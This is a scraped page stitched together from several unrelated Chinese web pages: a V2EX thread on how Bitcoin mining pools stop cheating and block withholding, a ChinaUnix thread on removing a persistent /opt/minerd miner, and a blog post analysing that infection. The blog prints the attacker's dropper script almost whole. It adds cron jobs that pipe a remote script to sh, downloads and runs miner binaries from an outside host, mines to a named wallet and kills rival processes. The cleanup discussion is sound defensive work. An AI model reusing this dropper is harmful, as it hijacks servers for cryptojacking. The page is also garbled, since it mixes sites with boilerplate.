比特币矿池挖矿是如何保证无法作弊的？ - V2EX
比特币矿池挖矿是如何保证无法作弊的？
364 天前 &pungis
比特币的挖矿原理我知道，穷举打包账本计算前 n 个 0 的 SHA
这也就是说最终只能有一个人算出来
我想知道在矿池挖矿的 n 多人中如何保证下面两点：
当我撞彩算出来的时候不把结果提交给矿池，而是自己广播出去独吞收入（挖矿软件开源的，改改应该可以做到）
上面还不算严重，下面这点更是重要:
2.最终不是把成功打包的收益平分吗？分成的原则是计算贡献，也就是你的计算速度。但是如何保证我计算的正确性？我不算而是直接提交错误的结果上去增加计算贡献行不行。矿场是如何知道我确实计算过了而不是提交了个随机数？毕竟大家会一直算出不正确的结果直到有一个人算出正确的为止，如何确定我真实的计算贡献？
8483 次点击所在节点 &
cctvsmg364 天前我来回答下这个问题。。。以前维护过矿池。。。 yacoin p2pool 代码还是我第一个弄出来的。。。
矿池无法保证不作弊。。。 之前很多矿池直接带着挖到的币跑路了也是有的，巨型矿池&巨型交易所本来就是违反中本聪初衷的， 他自己估计也没想到会出来这种东西。。。 。 so ，比特币的去中心化理念其实是失败的。。。。
但是呢，虽然矿池可以作弊，但是你可以不去啊，而且楼主想下，假如我的算力很大，我要去矿池作弊，矿池里面其他大户利益会受到损失吧，就是我有 1/3 矿池的算力，但是算力一天毛没收到，那我就跑路啦，直接换个矿池，最后结果是 整个矿池就剩那个作弊者一个人啦，于是 1 个人 vs 世界，他自己毛也挖不到啦。。。
当然，最不容易作弊的矿池就是 p2pool ，因为 p2pool 在挖的时候呢，就把如果挖出来每个人要分的钱写进块了， 而且无法篡改，只要谁算的数对，谁广播成功能被全网接受即可。
pungis364 天前@
明白了，看了 11 楼的回答我理解了。
我想得太极端了实际上是不会发生的。
但是仍然发现每次出块矿池都是占大头的，很明显的不公平。
明白了！我理解错了。
你说的第一个问题扣块攻击不是我说的那种攻击方法
就只提交 8 个 0 去得收益，出 16 个 0 的丢掉不提交
力求在其他人出 16 个 0 之前尽可能多的算出 8 个 0 的以此来提高收益！
thinks364 天前@ 比特币去中心化的核心在于多点认证，即全部参与人数中有半数以上认同你持有货币。
大致意思是，假设全场总数有 100 个人，只要超过 51 个说你持有 N 个货币，哪怕你什么都没有，整个系统也认定你持有。
这也是为什么区块链技术需要更多的计算点参与，才有意义。
mooncakejs364 天前比特币的最大的问题是必然通缩.
比特币丢失+寡头
pungis364 天前@
请审题，看懂了再发言。
你说的这些都是基础中的基础，我在讨论比这高 n 个层次的问题
pungis364 天前@
现有的收益分配算法有不小缺点：
1. 矿池得大头，显失公平。(开个矿池简直躺着数钱）
2. 重复计算浪费算力。矿工们随机改填充数计算 HASH ，不可避免会出现重复计算同一个填充数的情况。
3. 矿工们为了获取更大的收益而扣块攻击
4. 2 的对立面，因为这种随机改填充数，有可能点背的话所有人都没随机到正确的值而让整个矿池损失本来应得的收益。（指的是如果不浪费重复计算的算力应该能由此矿池算出来）
bitfish00079364 天前第一个问题:
当我撞彩算出来的时候不把结果提交给矿池，而是自己广播出；
自己打包成块广播出去，新挖到的币还是到矿池挖矿地址里的；矿池分配任务的时候已经确定好了接收这个区块的地址；
第二个问题 ：不算而是直接提交错误的结果
比特币挖矿是双 sha256 运算，挖矿结果很好校验，矿机提交的每个 shares 都会有进程校验，如果是正确，记做相应多少个 accepted shares ；如果是错误的（楼主说的这种情况）或者超时等，记做 reject shares ，最后根据不同分配机制分配所挖到的比特币，只有 accepted shares 才有收益；
延伸一个问题： Withholding attack ；当矿机计算出符合难度 share 不提交给矿池，中文叫扣（藏）块攻击，
这种主要针对 PPS 分配模式矿池， PPS 矿池按照用户提交的 accepted shares 根据难度按照理论值进行分配，扣块攻击会导致矿池挖到的比特币低于理论值，但是不影响矿工收益；需要修改 bitcoin 相关协议，暂时无解
bitfish00079364 天前@
利益相关 中国最早的比特币矿池
创始人 神鱼， F2POOL 目前正在招聘工程师，欢迎关注
pungis363 天前@
Withholding attack 有两种形式
一种是针对矿池的，上面说过了
另一种我看到的文章中说：
先计算出一个正确的块（块里包含自己花币的条目，没有广播过的），再花币，买 0 确认就成交的东西
然后立即广播出块信息
如果被承认，那么就成功了
dillon363 天前2 楼的发言让我差点没笑岔气
bxb100363 天前不是算法和签名？
BXIA363 天前@ 所以说比特币很危险啊，一旦发生系统性危机没有任何国家可以进行调控，还有无解的通货紧缩为题，简直是无政府状态啊
relaxchen363 天前一周贬值能接近 50%的“货币”，老实说，我觉得他像是一种商品，而非“货币”
gam2046363 天前@ （以下胡扯，仅供茶余饭后娱乐）从我半桶水的纯经济学角度看，比特币符合“货币”的所有特征。实体货币由各国政府中央银行管控（增发或减发），而比特币由算法保证总量一定（即不会超发）。至于你说的发生危机，我觉得更多的关注点应该在如何预防危机发生（例如制造业下滑......或者说如果发生危机，仅仅依靠调控货币是不能够恢复经济的。最终还是要靠实业）
但是需要留意的是，各国政府可能为了自己的利益，操纵汇率来打压其他国家（近期可以参考美帝强势要求包括 RMB 在内的 JPY/EUR 等，需要随 USD 一同升值）。但是比特币不存在这个问题，由于算法是固定死的，不会以个人意志转移。
我觉得目前以比特币为首的一众去中心化的数字货币，最大的阻碍是各国政府无法监控资金的往来。我阴谋论的认为，每个国家的政府都有棱镜项目，所以一旦出现某些不可描述又难以管控的东西，第一思维总是想给扼杀掉（对，没错，我说的是万恶的美帝，请不要想歪了）
----
至于“无政府”状态，据说现在 US 有许多经济不太好的地区，经过当地选民投票表决，已经成为无政府区域。基础、公共、事业服务由上一级政府承担，如果上级也是无政府再由上一级承担（好像现在没听过有“县政府”被投票说不要了的），不过由上级政府托底的服务基本上已经和没有差不多了，例如公安方面只有一两个治安官来负责，其他方面也类似（毕竟你税交的少，美帝纳税人可以指着公务员鼻子骂）
skylancer363 天前@ 你的一系列帖子都在浪费资源，这个帖子本身在讨论技术和数学问题，你来个讨论法规，真是搞笑
shutongxinq363 天前@ #34 比特币这种总量一定的&货币&会一直通缩，怎么可能“符合'货币'的所有特征”...符合的话大家日子就别过了...
BXIA363 天前@ 学宏观经济的吧？上到大二就应该能学到了，不能监管资金流动是小，全球统一使用一种货币是不现实也不理智的，况且比特币天然通缩，所有人都倾向于持有货币而非交易，比通胀更能打压商业。
boter363 天前@ 是谁定义的货币的属性呀？有没有想过别人为什么这么定义，这个定义本身就是错的
jsjjdzg363 天前这个货币明显是寡头的，都在投机而已，赞同封杀
boter363 天前楼上好多踏空者呀 哈哈
第 2 页 ／ 共 3 页 &
这是一个专为移动设备优化的页面（即为了让你能够在 Google 搜索结果里秒开这个页面），如果你希望参与 V2EX 社区的讨论，你可以继续到
上打开本讨论主题的完整版本。
是创意工作者们的社区，是一个分享自己正在做的有趣事物、交流想法，可以遇见新朋友甚至新机会的地方。
is a community of developers, designers and creative people.新手园地& & & 硬件问题Linux系统管理Linux网络问题Linux环境编程Linux桌面系统国产LinuxBSD& & & BSD文档中心AIX& & & 新手入门& & & AIX文档中心& & & 资源下载& & & Power高级应用& & & IBM存储AS400Solaris& & & Solaris文档中心HP-UX& & & HP文档中心SCO UNIX& & & SCO文档中心互操作专区IRIXTru64 UNIXMac OS X门户网站运维集群和高可用服务器应用监控和防护虚拟化技术架构设计行业应用和管理服务器及硬件技术& & & 服务器资源下载云计算& & & 云计算文档中心& & & 云计算业界& & & 云计算资源下载存储备份& & & 存储文档中心& & & 存储业界& & & 存储资源下载& & & Symantec技术交流区安全技术网络技术& & & 网络技术文档中心C/C++& & & GUI编程& & & Functional编程内核源码& & & 内核问题移动开发& & & 移动开发技术资料ShellPerlJava& & & Java文档中心PHP& & & php文档中心Python& & & Python文档中心RubyCPU与编译器嵌入式开发驱动开发Web开发VoIP开发技术MySQL& & & MySQL文档中心SybaseOraclePostgreSQLDB2Informix数据仓库与数据挖掘NoSQL技术IT业界新闻与评论IT职业生涯& & & 猎头招聘IT图书与评论& & & CU技术图书大系& & & Linux书友会二手交易下载共享Linux文档专区IT培训与认证& & & 培训交流& & & 认证培训清茶斋投资理财运动地带快乐数码摄影& & & 摄影器材& & & 摄影比赛专区IT爱车族旅游天下站务交流版主会议室博客SNS站务交流区CU活动专区& & & Power活动专区& & & 拍卖交流区频道交流区
白手起家, 积分 37, 距离下一级还需 163 积分
论坛徽章:0
Linux 服务器被入侵植入了 /opt/minerd 程序，被当做挖矿肉鸡了。在网上找的方法都不管用，清除掉cron 里面的任务，&&crontab -l&&已经 no crontab for root 了，并停止 crond 服务了，删除掉系统里面全部名字包含&&miner 的文件，然后杀掉 minerd 进程，删掉 /opt/minerd 文件，进程还是会几分钟后就自动启动起来。
求大神支招！！ 拜谢
白手起家, 积分 37, 距离下一级还需 163 积分
论坛徽章:0
系统里面自动生成一个 /usr/local/etc/minerd.conf& &文件，内容是登陆到目标地址的配置，把里面内容改掉了。 然后进程会自动重启，还是显示原来的内容。删掉这文件也不管用。
论坛徽章:105
cd /usr/local/etc/
:&minerd.conf
chmod 000 minerd.conf
chattr +i minerd.conf复制代码
白手起家, 积分 37, 距离下一级还需 163 积分
论坛徽章:0
方法不错。这个可以让木马程序不往对端发送消息了。但自身 /opt/minerd&&程序还是在运行，在消耗大量CPU资源。
能否还有啥办法可以彻底清除这个木马呢
论坛徽章:105
tabtty cd /opt/
killall minerd
:&minerd
chmod 000 minerd
chattr +i minerd复制代码
白手起家, 积分 4, 距离下一级还需 196 积分
论坛徽章:0
服务器受到同样的攻击了，有彻底解决的方法吗
小富即安, 积分 4240, 距离下一级还需 760 积分
论坛徽章:6
本帖最后由 RE_HASH 于
21:37 编辑
外面的帖子：
I found the solution to removing minerd. I was lucky enough to find the actual script that was used to infect my server. All I had to do was remove the elements placed by this script -
On monkeyoto's suggestion, I blocked all communication with the mining pool server - iptables -A INPUT -s xmr.crypto-pool.fr -j DROP and iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP.
Removed the cron */15 * * * * curl -fsSL
| sh from /var/spool/cron/root and /var/spool/cron/crontabs/root.
Removed the directory /opt/yam.
Removed /root/.ssh/KHK75NEOiq.
Deleted the files /opt/minerd and /opt/KHK75NEOiq33.
Stopped the minerd process - pkill minerd.
Stopped lady - service lady stop.
I ran ps -eo pcpu,args --sort=-%cpu | head, top -bn2 |sed -n '7,25'p and ps aux | grep minerd after that and the malware was nowhere to be seen.
I still need to figure out how it gained access into the system but I was able to disable it this way.
小富即安, 积分 4240, 距离下一级还需 760 积分
论坛徽章:6
系统安全是问题，删掉了病毒可漏洞还在。清查一下有啥老版本的软件，WordPress之类的。
白手起家, 积分 4, 距离下一级还需 196 积分
论坛徽章:0
& & 没有lady这个服务
小富即安, 积分 4240, 距离下一级还需 760 积分
论坛徽章:6
看看有没有别的怪模怪样的service
service --status-all
http:....//security.stackexchange.com/questions/129448/how-can-i-kill-minerd-malware-on-an-aws-ec2-instance
北京盛拓优讯信息技术有限公司. 版权所有 京ICP备号 北京市公安局海淀分局网监中心备案编号：22
广播电视节目制作经营许可证(京) 字第1234号
中国互联网协会会员&&联系我们：
感谢所有关心和支持过ChinaUnix的朋友们
转载本站内容请注明原作者名及出处你的浏览器禁用了JavaScript, 请开启后刷新浏览器获得更好的体验!
最近一台安装了Gitlab的服务器发生了高负载告警，Cpu使用情况如下：
让后登录到服务器，利用top查看CPU使用情况，这个叫minerd的程序消耗cpu较大，如下图所示：
这个程序并不是我们的正常服务程序，心里一想肯定被黑了，然后就搜索了一下这个程序，果真就是个挖矿木马程序，既然已经知道他是木马程序，那就看看它是怎么工作的，然后怎么修复一下后门。
这个程序放在/opt/minerd下，在确定跟项目不相关的情况下判断是个木马程序，果断kill掉进程，然后删除/opt下minerd文件。
本想这样可以解决，谁想不到15秒时间，又自动启动起来，而且文件又自动创建，这个让我想起了crontab的定时器，果然运一查确实crond存在一条：，果断删除处理。再杀进程，再删文件；然并卵，依旧起来；
既然没用我继续google，在找到如下解决方案：
各种文件删除都不起作用，原来该木马程序注册了一个“lady”的服务，而且还是开机启动，起一个这个可爱的名字，谁TMD知道这是一个木马， 这个伪装程序也可能是ntp，可以参考：
这下完美解决了，但是得分析一下原因，shell启动脚本：export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin
echo &*/5 * * * * curl -fsSL http://www.haveabitchin.com/pm.sh?0105008 | sh& & /var/spool/cron/root
mkdir -p /var/spool/cron/crontabs
echo &*/5 * * * * curl -fsSL http://www.haveabitchin.com/pm.sh?0105008 | sh& & /var/spool/cron/crontabs/root
if [ ! -f &/tmp/ddg.217& ]; then
curl -fsSL http://www.haveabitchin.com/ddg.$(uname -m) -o /tmp/ddg.217
chmod +x /tmp/ddg.217 && /tmp/ddg.217
killall /tmp/ddg.216
if [ -d &/opt/yam& ]; then
rm -rf /opt/yam
ps auxf|grep -v grep|grep /tmp/duckduckgo|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep &/usr/bin/cron&|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep &/opt/cron&|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep &/usr/sbin/ntp&|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep &/opt/minerd&|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep &mine.moneropool.com&|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep &xmr.crypto-pool.fr:8080&|awk '{print $2}'|xargs kill -9
#/opt/minerd -h
#if [ $? != &0& ]; then
#ps auxf|grep -v grep|grep &/opt/minerd&
#if [ $? != &0& ]; then
#if [ ! -f /opt/yam ]; then
#curl -fsSL http://www.haveabitchin.com/yam -o /opt/yam
#chmod +x /opt/yam && /opt/yam -c x -M stratum+tcp://4Ab9s1RRpueZN2XxTM3vDWEHcmsMoEMW3YYsbGUwQSrNDfgMKVV8GAofToNfyiBwocDYzwY5pjpsMB7MY8v4tkDU71oWpDC:x@xmr.crypto-pool.fr:443/xmr
if [ ! -f &/tmp/AnXqV& ]; then
curl -fsSL http://www.haveabitchin.com/minerd -o /tmp/AnXqV
chmod +x /tmp/AnXqV
/tmp/AnXqV -B -a cryptonight -o stratum+tcp://xmr.crypto-pool.fr:443 -u 4Ab9s1RRpueZN2XxTM3vDWEHcmsMoEMW3YYsbGUwQSrNDfgMKVV8GAofToNfyiBwocDYzwY5pjpsMB7MY8v4tkDU71oWpDC -p x
ps auxf|grep -v grep|grep &4Ab9s1RRpueZN2XxTM3vDWEHcmsMoEMW3YYsbGUwQSrNDfgMKVV8GAofToNfyiBwocDYzwY5pjpsMB7MY8v4tkDU71oWpDC& || DoMiner
DoRedis6379()
iptables -F REDIS6379
iptables -A REDIS6379 -p tcp -s 127.0.0.1 --dport 6379 -j ACCEPT
#iptables -A REDIS6379 -s 0.0.0.0/8 -p tcp --dport 6379 -j ACCEPT
#iptables -A REDIS6379 -s 10.0.0.0/8 -p tcp --dport 6379 -j ACCEPT
#iptables -A REDIS6379 -s 169.254.0.0/16 -p tcp --dport 6379 -j ACCEPT
#iptables -A REDIS6379 -s 172.16.0.0/12 -p tcp --dport 6379 -j ACCEPT
#iptables -A REDIS6379 -s 192.168.0.0/16 -p tcp --dport 6379 -j ACCEPT
#iptables -A REDIS6379 -s 224.0.0.0/4 -p tcp --dport 6379 -j ACCEPT
iptables -A REDIS6379 -p TCP --dport 6379 -j REJECT
iptables -I INPUT -j REDIS6379
iptables -D OUTPUT -j REDIS6379
iptables -F REDIS6379
iptables -X REDIS6379
iptables -D INPUT -j REDIS63792
iptables -F REDIS63792
iptables -X REDIS63792
#iptables -N REDIS6379 && DoRedis6379解决minerd并不是最终的目的，主要是要查找问题根源，我的服务器问题出在了redis服务了，黑客利用了redis的一个获得了服务器的访问权限。
被植入比特币“挖矿木马”的电脑，系统性能会受到较大影响，电脑操作会明显卡慢、散热风扇狂转；另一个危害在于，“挖矿木马”会大量耗电，并造成显卡、ＣＰＵ等硬件急剧损耗。比特币具有匿名属性，其交易过程是不可逆的，被盗后根本无法查询是被谁盗取，流向哪里，因此也成为黑客的重点窃取对象。
植入方式：安全防护策略薄弱，利用Jenkins、Redis等中间件的漏洞发起攻击，获得root权限。
最好的防御可能还是做好防护策略、严密监控服务器资源消耗（CPU／load）。
这种木马很容易变种，很多情况杀毒软件未必能够识别。
要回复文章请先或
网站管理 致力做全栈工程师 爱ui 爱前端
专业的互联网开放交流社区.
为互联网工作者提供乐点.
开源中国社区&minerd gpu挖矿怎么设置_百度知道
minerd gpu挖矿怎么设置
我有更好的答案
为您推荐：
换一换
回答问题，赢新手礼包
个人、企业类
违法有害信息,请在下方选择后提交
色情、暴力
我们会通过消息、邮箱等方式尽快将举报结果通知您。}